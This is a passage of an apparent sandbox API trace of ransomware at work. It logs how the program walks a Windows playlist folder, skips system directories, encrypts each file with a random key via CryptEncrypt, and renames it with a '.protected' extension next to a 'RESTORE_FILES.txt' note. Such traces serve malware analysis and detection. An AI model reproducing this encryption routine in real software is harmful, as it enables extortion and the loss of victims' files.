Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl") returned 123 [0094.070] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".rar") returned 0x0 [0094.070] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl") returned 123 [0094.070] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".zip") returned 0x0 [0094.070] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x410, lpOverlapped=0x0) returned 1 [0094.071] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.072] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x410, lpOverlapped=0x0) returned 1 [0094.072] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.072] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.072] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.072] CloseHandle (hObject=0x158) returned 1 [0094.072] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.protected") returned 133 [0094.072] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl.protected")) returned 1 [0094.073] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.073] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="Windows") returned -1 [0094.073] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="Program Files") returned -1 [0094.073] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0094.073] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0094.073] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="System Volume Information") returned -1 [0094.073] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl") returned 122 [0094.073] StrStrIW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".protected") returned 0x0 [0094.073] lstrcmpW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0094.073] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.073] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.074] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl") returned 122 [0094.074] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0094.074] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl") returned 122 [0094.074] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".rar") returned 0x0 [0094.074] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl") returned 122 [0094.074] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".zip") returned 0x0 [0094.074] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x3fc, lpOverlapped=0x0) returned 1 [0094.082] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffc04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.082] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x3fc, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x3fc, lpOverlapped=0x0) returned 1 [0094.082] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.082] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.082] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.082] CloseHandle (hObject=0x158) returned 1 [0094.082] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.protected") returned 132 [0094.082] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl.protected")) returned 1 [0094.083] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.083] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="Windows") returned -1 [0094.083] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="Program Files") returned -1 [0094.083] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="Program Files (x86)") returned -1 [0094.083] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="$Recycle.bin") returned 1 [0094.083] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="System Volume Information") returned -1 [0094.083] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl") returned 116 [0094.083] StrStrIW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".protected") returned 0x0 [0094.083] lstrcmpW (lpString1="09_Music_played_the_most.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0094.083] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.083] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.085] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl") returned 116 [0094.085] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".txt") returned 0x0 [0094.085] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl") returned 116 [0094.085] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".rar") returned 0x0 [0094.085] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl") returned 116 [0094.085] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".zip") returned 0x0 [0094.085] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x401, lpOverlapped=0x0) returned 1 [0094.089] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.089] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x401, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x401, lpOverlapped=0x0) returned 1 [0094.091] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.091] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.092] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.092] CloseHandle (hObject=0x158) returned 1 [0094.092] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.protected") returned 126 [0094.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl.protected")) returned 1 [0094.093] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.093] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="Windows") returned -1 [0094.093] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="Program Files") returned -1 [0094.093] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="Program Files (x86)") returned -1 [0094.093] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="$Recycle.bin") returned 1 [0094.093] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="System Volume Information") returned -1 [0094.093] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl") returned 104 [0094.093] StrStrIW (lpFirst="10_All_Music.wpl", lpSrch=".protected") returned 0x0 [0094.093] lstrcmpW (lpString1="10_All_Music.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0094.093] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.093] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.094] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl") returned 104 [0094.094] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".txt") returned 0x0 [0094.094] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl") returned 104 [0094.094] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".rar") returned 0x0 [0094.094] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl") returned 104 [0094.094] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".zip") returned 0x0 [0094.094] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x427, lpOverlapped=0x0) returned 1 [0094.095] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbd9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.095] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x427, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x427, lpOverlapped=0x0) returned 1 [0094.095] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.095] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.095] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.096] CloseHandle (hObject=0x158) returned 1 [0094.096] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.protected") returned 114 [0094.096] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl.protected")) returned 1 [0094.096] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.096] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="Windows") returned -1 [0094.096] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="Program Files") returned -1 [0094.096] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="Program Files (x86)") returned -1 [0094.096] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="$Recycle.bin") returned 1 [0094.096] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="System Volume Information") returned -1 [0094.096] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl") returned 107 [0094.097] StrStrIW (lpFirst="11_All_Pictures.wpl", lpSrch=".protected") returned 0x0 [0094.097] lstrcmpW (lpString1="11_All_Pictures.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0094.097] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.097] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.097] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl") returned 107 [0094.097] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".txt") returned 0x0 [0094.097] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl") returned 107 [0094.097] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".rar") returned 0x0 [0094.097] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl") returned 107 [0094.097] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".zip") returned 0x0 [0094.097] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x249, lpOverlapped=0x0) returned 1 [0094.099] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffdb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.099] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x249, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x249, lpOverlapped=0x0) returned 1 [0094.099] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.099] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.099] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.099] CloseHandle (hObject=0x158) returned 1 [0094.099] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.protected") returned 117 [0094.099] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl.protected")) returned 1 [0094.100] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.100] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="Windows") returned -1 [0094.100] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="Program Files") returned -1 [0094.100] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="Program Files (x86)") returned -1 [0094.100] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="$Recycle.bin") returned 1 [0094.100] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="System Volume Information") returned -1 [0094.100] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl") returned 104 [0094.100] StrStrIW (lpFirst="12_All_Video.wpl", lpSrch=".protected") returned 0x0 [0094.100] lstrcmpW (lpString1="12_All_Video.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0094.100] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.100] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.101] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl") returned 104 [0094.101] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".txt") returned 0x0 [0094.101] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl") returned 104 [0094.101] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".rar") returned 0x0 [0094.101] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl") returned 104 [0094.101] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".zip") returned 0x0 [0094.101] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x437, lpOverlapped=0x0) returned 1 [0094.103] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbc9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.103] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x437, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x437, lpOverlapped=0x0) returned 1 [0094.103] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.103] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.103] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.103] CloseHandle (hObject=0x158) returned 1 [0094.103] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: 